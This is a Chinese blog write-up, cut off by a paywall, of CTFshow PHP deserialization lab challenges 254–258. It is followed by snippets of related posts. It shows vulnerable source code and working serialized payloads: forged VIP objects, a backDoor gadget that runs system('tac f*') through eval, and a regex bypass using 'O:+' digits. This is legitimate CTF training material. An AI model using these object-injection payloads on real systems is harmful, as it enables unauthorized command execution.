【CTFSHOW】web入门反序列化

最新推荐文章于 2025-04-18 16:23:52 发布
最新推荐文章于 2025-04-18 16:23:52 发布
阅读量3.7k 收藏 7
点赞数 1
分类专栏: CTFSHOW 文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_46003360/article/details/119089018
版权

文章目录

web254

include('flag.php');

class ctfShowUser{
   
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
   
        return $this->isVip;
    }
    public function login($u,$p){
   
        if($this->username===$u&&$this->password===$p){
   
            $this->isVip=true;
        }
        return $this->isVip;
    }
    public function vipOneKeyGetFlag(){
   
        if($this->isVip){
   
            global $flag;
            echo "your flag is ".$flag;
        }else{
   
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
   
    $user = new ctfShowUser();
    if($user->login($username,$password)){
   
        if($user->checkVip()){
   
            $user->vipOneKeyGetFlag();
        }
    }else{
   
        echo "no vip,no flag";
    }
}

GET传参即可:

unserialize254flag

web255

class ctfShowUser{
   
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;

    public function checkVip(){
   
        return $this->isVip;
    }
    public function login($u,$p){
   
        return $this->username===$u&&$this->password===$p;
    }
    public function vipOneKeyGetFlag(){
   
        if($this->isVip){
   
            global $flag;
            echo "your flag is ".$flag;
        }else{
   
            echo "no vip, no flag";
        }
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
   
    $user = unserialize($_COOKIE['user']);    
    if($user->login($username,$password)){
   
        if($user->checkVip()){
   
            $user->vipOneKeyGetFlag();
        }
    }else{
   
        echo "no vip,no flag";
    }
}

这次使用反序列化了,但是要对序列化后的对象中分号‘;’进行url编码。因为cookie是以;作为分隔符的,否则会导致解析错误。我们索性对序列化后的结果全部进行url半编码。

新建一个php文件执行:

<?php
class ctfShowUser{
   
    public $isVip=true;
}
$a = new ctfShowUser();
echo urlencode(serialize($a)); // O%3A11%3A%22ctfShowUser%22%3A1%3A%7Bs%3A5%3A%22isVip%22%3Bb%3A1%3B%7D

hackbar设置cookie头即可。payload如下:

unserialize255flag

web256

public function vipOneKeyGetFlag(){
   
        if($this->isVip){
   
            global $flag;
            if($this->username!==$this->password){
   
                    echo "your flag is ".$flag;
              }
        }else{
   
            echo "no vip, no flag";
        }
  }

这次添加了用户名和密码不能相同,在序列化时设置一下就好:

<?php
class ctfShowUser{
   
    public $username='truthahn';
    public $password='llama';
    public $isVip=true;
}

$a = new ctfShowUser();
echo urlencode(serialize($a));

payload:

unserialize256flag

web257

class ctfShowUser{
   
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $isVip=false;
    private $class = 'info';

    public function __construct(){
   
        $this->class=new info();
    }
    public function login($u,$p){
   
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
   
        $this->class->getInfo();
    }

}

class info{
   
    private $user='xxxxxx';
    public function getInfo(){
   
        return $this->user;
    }
}

class backDoor{
   
    private $code;
    public function getInfo(){
   
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
   
    $user = unserialize($_COOKIE['user']);
    $user->login($username,$password);
}

增加了后门类,直接更改class为后门类并给code变量赋值即可:

<?php
class ctfShowUser{
   
    private $username='xxxxxx';
    private $password='xxxxxx';
    private $class = 'info';

    public function __construct(){
   
        $this->class=new backDoor();
    }
    public function login($u,$p){
   
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
   
        $this->class->getInfo();
    }

}

class backDoor{
   
    private $code="system('tac f*');";
    public function getInfo(){
   
        eval($this->code);
    }
}

echo urlencode(serialize(new ctfShowUser()));

payload:

unserialize257flag

web258

class ctfShowUser{
   
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $isVip=false;
    public $class = 'info';

    public function __construct(){
   
        $this->class=new info();
    }
    public function login($u,$p){
   
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
   
        $this->class->getInfo();
    }

}

class info{
   
    public $user='xxxxxx';
    public function getInfo(){
   
        return $this->user;
    }
}

class backDoor{
   
    public $code;
    public function getInfo(){
   
        eval($this->code);
    }
}

$username=$_GET['username'];
$password=$_GET['password'];

if(isset($username) && isset($password)){
   
    if(!preg_match('/[oc]:\d+:/i', $_COOKIE['user'])){
   
        $user = unserialize($_COOKIE['user']);
    }
    $user->login($username,$password);
}

在反序列化之前进行了正则匹配,规则如下:

unserialize258regular

要求不能出现O/C:数字的形式,我们可以将序列化中的类似形式更改为O/C:+数字的形式来绕过过滤:

O:11:"ctfShowUser":3:{
   s:8:"username";s:6:"xxxxxx";s:8:"password";s:6:"xxxxxx";s:5:"class";O:8:"backDoor":1:{
   s:4:"code";s:17:"system('tac f*');";}}

发现有两处:“O:11"和"O:8”。

<?php
class ctfShowUser{
   
    public $username='xxxxxx';
    public $password='xxxxxx';
    public $class = 'info';

    public function __construct(){
   
        $this->class=new backDoor();
    }
    public function login($u,$p){
   
        return $this->username===$u&&$this->password===$p;
    }
    public function __destruct(){
   
        $this->class->getInfo();
    }

}

class backDoor{
   
    public
最低0.47元/天 解锁文章
[ctf.show]web入门 反序列化
Huamang的博客
02-20 560
web 254 和反序列化没啥关系,就是代码审计 payload:?username=xxxxxx&password=xxxxxx web 255 账号密码的赋值和上面一样,就是多了一个cookie['user'],用burp抓包解决 highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; p
ctfshow web入门 反序列化
2301_79442654的博客
03-24 786
分析代码:如果用户名和密码参数都存在,脚本会创建一个类的实例$user。接着,调用方法尝试登录。如果登录成功(即用户名和密码与类中的默认值匹配),并且用户被标记为VIP($isVip为true),则调用方法输出$flag的值。如果登录失败或用户不是VIP,脚本将输出 "no vip, no flag"。要让程序返回true需要确保通过GET请求传递的用户名和密码与 ctfShowUser 类中定义的默认用户名和密码相匹配。默认的用户名和密码都是 'xxxxxx'。
ctfshow web入门——反序列化
m0_74093152的博客
06-25 1818
代码审计,上传username=xxxxxx&password=xxxxxx即可获得flag。
CTFSHOW 反序列化 267 Yii2反序列化
最新发布
m0_63017297的博客
04-18 105
发现之后反回一个错误页面,并没有回显。利用ls查看当前目录下并没有flag文件,将结果重定向到2.txt。这里不知道flag文件位置,就利用cp将flag文件拷贝至1.txt,查看结果。看到反序列化传参,但是没有源码,这里直接查看框架发现是yii。接着用phpggc生成exp,一开始尝试用cat进行读取。login进行登录,admin/admin。
ctfshow web入门-反序列化
akxnxbshai的博客
05-19 1345
反序列化中常用的魔术方法: __wakeup() //执行unserialize()时,先会调用这个函数 __sleep() //执行serialize()时,先会调用这个函数 __destruct() //对象被销毁时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //用于从不可访问的属性读取数据或者不存在这个键都会调用此方法 __set() //用于将数据写入不可访问的属性 _.
ctfshow-web入门-反序列化
K_kiii的博客
03-23 618
_sleep() ://在对象被序列化之前运行__wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过)如果类中同时定义了 __unserialize() 和__wakeup() 两个魔术方法, 则只有__unserialize() 方法会生效,__wakeup() 方法会被忽略。此特性自 PHP 7.4.0 起可用。__construct() :当对象被创建时,会触发进行初始化__destruct() :对象被销毁时触发。
【CTF-WEB基础】ctfshow-web入门-257—反序列化
yu_fly_fish的博客
08-14 248
一起加油!
ctf_show笔记篇(web入门---反序列化
whale_waves的博客
03-19 2203
例如$a = 1 $b = 2, 这时让$b = &$a, 再给$a 重新赋个值 $a = 3, 这个时候$b就会一直跟着$a变化, $a是什么$b就是什么。利用php处理畸形的序列化的处理措施, 当php收到畸形的序列化时, 会因为对此序列化的不放心, 会第一时间处理掉它, 所以能直接让处理他的顺序排在了最前面。这时, 如果传入一个|O:5:"Class"类似于这样的序列化, php就会自动把|前面的当作键名用, 反而会反序列化|后的值。
ctfshow——反序列化
qq_55202378的博客
02-26 1129
不要相等即可,注意GET传参时也要做修改。这里就是使用GET传输,username赋值为。变量进行反序列化,因此只需要GET传输的变量。以上一题相比,其实就是反序列化的类中的变量。,注意需要对user的值进行URL编码。,password也1赋值为。相等,且反序列化后的。
ctfshow web入门反序列化
qq_53063436的博客
11-06 1685
魔术变量: __sleep() //在对象被序列化之前运行 __wakeup() //将在反序列化之后立即调用(当反序列化时变量个数与实际不符是会绕过) __construct() //在类实例化时,会触发进行初始化 __destruct() //对象被销毁时触发 __toString(): //当一个对象被当作字符串使用时触发 __call() //在对象上下文中调用不可访问的方法时触发 __callStatic() //在静态上下文中调用不可访问的方法时触发 __get() //获得一个类的成员变量时调
CTFSHOW-WEB入门-反序列化(笔记)
A10ng_的博客
04-14 2908
web254 <?php /* # -*- coding: utf-8 -*- # @Author: h1xa # @Date: 2020-12-02 17:44:47 # @Last Modified by: h1xa # @Last Modified time: 2020-12-02 19:29:02 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ error_reporting(0); highlight_file(__
ctfshowweb入门php反序列化
m0_74013288的博客
11-12 1711
虽然序列化时会调用sleep()函数,给username和password赋值为空,但是反序列化时会进入__unserialize中,在最后进行反序列化的时候又会重现赋值,所以可以不用管这个函数,,,invoke函数也没有调用,所以不用管。分析代码,发现需要使ctfShowUser这个类里面的username和password不一样,因为是序列化,对象的属性(变量)和构造方法内的变量赋值我们是可控的,所以我们将username和password改成不一样的就行。查看页面源代码,可以找到我们反序列化的入口;
ctfshowweb入门反序列化
2301_80337881的博客
03-24 1133
别看上面乌拉乌拉一大堆,实际上就是要检测你传入的username和password和类中定义的username和password一不一样。所以直接get传参就可以了。
[ctfshow-web]反序列化
nareku的博客
07-25 392
PHP中的魔术变量__sleep()//执行serialize()时,先会调用这个函数__wakeup()//将在反序列化之后立即调用(当反序列化时变量个数与实际不符时绕过)__construct()//当对象被创建时,会触发进行初始化__destruct()//对象被销毁时触发//当一个对象被当作字符串使用时触发__call()//在对象上下文中调用不可访问的方法时触发__callStatic()//在静态上下文中调用不可访问的方法时触发。......
CTFshow-WEB入门-反序列化
feng的博客
02-14 5919
前言 简单的反序列化直接给出payload,有意思的,较为复杂的和我不太会的会分析一波。 web254 ?username=xxxxxx&password=xxxxxx web255 <?php class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; public $isVip=true; } echo urlencode(serialize(new ctfShowUser())
CTF_Web反序列化学习笔记(一)php中的类与对象
AFCC_的博客(Web_Dog)
08-13 1952
0x00 前言 前期第一次遇到反序列化这方面题目的时候,也看了不少资料,都是前辈们写的总结,但是都是直接从在ctf中的运用开始的,自己在这段时间整理的过程中,发现对于php类与对象了解不是很多,导致在看一些题目、或值前辈的总结时都比较困难,下面参考php文档,结合自己对php类与对象的理解先把反序列化的基础知识做一下整理。 0x01 php类与对象 class 在php手册中这样介绍: 每个类的定义都以关键字 class 开头,后面跟着类名,后面跟着一对花括号,里面包含有类的属性与方法
ctfshow web入门 反序列化(持续更新)
Lum1n0us's Blog
02-02 1739
文章目录web254web255web256web257web258web259web260web261web262web263web264web265web266 web254 <?php error_reporting(0); highlight_file(__FILE__); include('flag.php'); class ctfShowUser{ public $username='xxxxxx'; public $password='xxxxxx'; publ
ctfshow 反序列化
01-21
### CTFShow平台中的反序列化挑战解决方案 #### 背景介绍 CTFShow是一个提供多种信息安全竞赛题目和教程的学习平台。其中涉及到了许多Web安全漏洞的实践练习,包括SQL注入、XSS攻击以及反序列化漏洞等。 #### 反序列化的概念 反序列化是指将保存的对象状态信息转换为对象的过程。如果应用程序允许用户控制的数据参与此过程,则可能导致严重的安全隐患,如远程代码执行(RCE)[^3]。 #### CTFShow上的反序列化挑战实例 在CTFShow平台上存在多个有关PHP反序列化的挑战案例。通常情况下,这些挑战会给出一个带有已知类定义的服务端脚本,并提示参与者通过构造恶意输入来触发特定行为完成解题目标。 对于此类问题的一般解决思路如下: 1. **分析源码** 查看给定程序逻辑,识别出可能被利用的地方。特别是那些接受外部可控参数并对其进行unserialize()操作的位置[^4]。 2. **寻找可操控点** 寻找能够影响到`__destruct()` 或者 `__wakeup()` 魔术函数调用链路的机会。因为当对象销毁时这两个特殊成员会被自动调用,在这里可以植入自定义指令实现任意命令执行等功能[^5]. 3. **构建Payload** 利用上述发现创建合适的payload字符串,使其能够在服务器上成功解析成预期形态从而达成目的。这一步骤往往需要结合具体环境下的其他条件共同考虑,比如php版本差异等因素都会带来不同表现形式[^6]. ```php // 假设有一个简单的易受攻击的 PHP 类 class VulnerableClass { public $command; function __destruct(){ system($this->command); } } // 构造 Payload 实现反弹 Shell 的例子 (仅作教学用途) $malicious_data = 'O:13:"VulnerableClass":1:{s:7:"command";s:9:"whoami > /tmp/output";}' ``` 请注意以上代码仅为说明原理所用,在实际环境中切勿非法尝试!
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

TurkeyMan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值